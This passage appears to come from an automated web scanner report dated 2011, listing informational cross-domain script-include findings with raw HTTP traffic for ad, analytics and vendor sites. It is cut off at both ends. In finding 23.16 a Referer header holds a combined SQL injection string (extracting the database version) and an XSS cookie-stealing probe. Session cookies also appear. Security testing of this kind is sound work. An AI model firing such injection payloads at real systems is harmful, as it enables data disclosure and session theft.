cThuVzNDR2ZKOFJRbmVtOVZlLUduNlBzX2cmY2xpZW50PWNhLXB1Yi00NDU2MTgyMTM1OTU2OTc0JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=156936241" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.2. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The response dynamically includes the following scripts from other domains:

http://servedby.adxpose.com/adxpose/find_ad.js
http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=499353087?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUiPbw6T2uHVm68iJ.eWaH0XWjcghnZW8sdXNhLHQsMTMwMzc0MTM5MzU2NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQTBBZmhldFJ1QjREUUFBQUFNRE16QWhBemN6TXpNek1DRUROek16TXpNd0lRT3RnOFFIemNyMGJTc1lkYTZiMnppVWhnN1ZOQUFBQUFDOGhBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUpfQ2s4QWh3UUJBZ1VDQUFRQUFBQUFmeVdNUVFBQUFBQS4vY25kPSEweFZtWVFqMjVRSVF4c2tLR0FBZzBjY0JLRTh4QUFBQXdNek1DRUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUDhVWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL2dhbWVzLndlYmFsdGEucnUvL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIyRGJySUlPMVRlQ3RJY2ZNc1FldnI2M2tEZGZxLU5NQm42Q1U3QmpieE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkweE1UTTBPREl5TmpneU5URXdPRGM1b0FIRDh2M3NBN0lCRUdkaGJXVnpMbmRsWW1Gc2RHRXVjblc2QVFveE5qQjROakF3WDJGenlBRUoyZ0VZYUhSMGNEb3ZMMmRoYldWekxuZGxZbUZzZEdFdWNuVXZtQUxXRXNBQ0JNZ0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-/clkurl=
http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUlAz8J7YZQuuVKsw_ef0aAc0zrdADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34v16vZuOQ6smNO4ZRLcruOUy7C6xpOOb8JITjlXBs4oHJtQHd.B7rTBebODgn32zj1Sdhp49LXfnLnJlz62k_OqMUpd0J4MU65Ywse4ZQ7.lUQp9yMBey45WxbccpNf.iJW65jJW45U12cctNuKuKUqyzzBYY7I275biGgPIPvlp0NDBzAhLSTkZGRgSHwFiMzkGIwYGIQBvEVzMDCSwvAwiyZjGxAQZYQJjZGdiBDfhcTAzdIGTQNggxkAAAFopIm; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:23:13 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3734
Date: Mon, 25 Apr 2011 14:23:13 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=499353087?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUiPbw6T2uHVm68iJ.eWaH0XWjcghnZW8sdXNhLHQsMTMwMzc0MTM5MzU2NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQTBBZmhldFJ1QjREUUFBQUFNRE16QWhBemN6TXpNek1DRUROek16TXpNd0lRT3RnOFFIemNyMGJTc1lkYTZiMnppVWhnN1ZOQUFBQUFDOGhBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUpfQ2s4QWh3UUJBZ1VDQUFRQUFBQUFmeVdNUVFBQUFBQS4vY25kPSEweFZtWVFqMjVRSVF4c2tLR0FBZzBjY0JLRTh4QUFBQXdNek1DRUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUDhVWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL2dhbWVzLndlYmFsdGEucnUvL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIyRGJySUlPMVRlQ3RJY2ZNc1FldnI2M2tEZGZxLU5NQm42Q1U3QmpieE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkweE1UTTBPREl5TmpneU5URXdPRGM1b0FIRDh2M3NBN0lCRUdkaGJXVnpMbmRsWW1Gc2RHRXVjblc2QVFveE5qQjROakF3WDJGenlBRUoyZ0VZYUhSMGNEb3ZMMmRoYldWekxuZGxZbUZzZEdFdWNuVXZtQUxXRXNBQ0JNZ0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1508694624" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.3. http://auto.webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://auto.webalta.ru
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://mc.yandex.ru/metrika/watch.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>................
...[SNIP]...
</script>
           <script type="text/javascript"
           src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...
</div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
...[SNIP]...

23.4. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl

Issue detail

The response dynamically includes the following scripts from other domains:

https://secure.eset.com/us/scripts/lib/s_code3.js
https://secure.eset.com/us/store/geoIpRedirect

Request

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
00&bgbutton=F2F4F6&bgrequiredfld=ffffff&font=Arial%2CHelvetica%2Csans-serif&size_site_content=10pt&size_site_title=10pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...


<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...

23.5. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s.nl/c.438708/n.1/sc.4/.f

Issue detail

The response dynamically includes the following scripts from other domains:

https://secure.eset.com/us/scripts/lib/s_code3.js
https://secure.eset.com/us/store/geoIpRedirect

Request

Response

23.6. http://direct.yandex.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.yandex.net/y5/1.5b-c/mega-y5.js
http://yandex.st/jquery/1.4.2/jquery.min.js
http://yandex.st/lego/2.4-73/common/js/_common.js

Request

Response

23.7. http://forums.manageengine.com/fbw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The response dynamically includes the following scripts from other domains:

http://css.zohostatic.com/discussions/v1/js/crossdomain.js
http://css.zohostatic.com/discussions/v1/js/zdjquery.min.js

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:11:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 25830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<link href="//css.zohostatic.com/discussions/v1/css/feedbackembed.css" type="text/css" rel="stylesheet"/>
<script src="//css.zohostatic.com/discussions/v1/js/zdjquery.min.js" type="text/javascript" ></script>
<script src="//css.zohostatic.com/discussions/v1/js/crossdomain.js" type="text/javascript" ></script>
...[SNIP]...

23.8. http://games.webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://games.webalta.ru
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: games.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>........ .... web
...[SNIP]...
</script>
           <script type="text/javascript"
           src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
           </script>
...[SNIP]...

23.9. http://goods.adnectar.com/static/quantcast_1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/static/quantcast_1.html

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /static/quantcast_1.html HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adnectar_id=PObkQ021gzROKXjpBM+iAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:36 GMT
Content-Type: text/html
Content-Length: 590
Last-Modified: Fri, 22 Apr 2011 00:28:44 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

</head>

<body>

<!-- Star
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.10. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js

Request

Response

23.11. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

23.12. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1645

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D"></script>
...[SNIP]...

23.13. http://ideco-software.ru/products/ims/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ideco-software.ru
Path:	/products/ims/

Issue detail

The response dynamically includes the following script from another domain:

http://bs.yandex.ru/resource/watch.js

Request

Response

23.14. http://learn.shavlik.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1
http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js
http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js
http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js
http://www.oppsource.com/wp-includes/js/comment-reply.js?ver=20090102
http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2

Request

GET / HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.3.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Le
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/comment-reply.js?ver=20090102'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...

23.15. http://learn.shavlik.com/shavlik/N previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/N

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1
http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js
http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js
http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js
http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2

Request

GET /shavlik/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: learn.shavlik.com

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 25 Apr 2011 12:17:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 12:17:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...

23.16. http://learn.shavlik.com/shavlik/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/a

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1
http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js
http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js
http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js
http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2

Request

GET /shavlik/a HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))29f68%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8c4ff1d7709&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.8.10.1303732848

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 25 Apr 2011 12:45:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 12:45:36 GMT
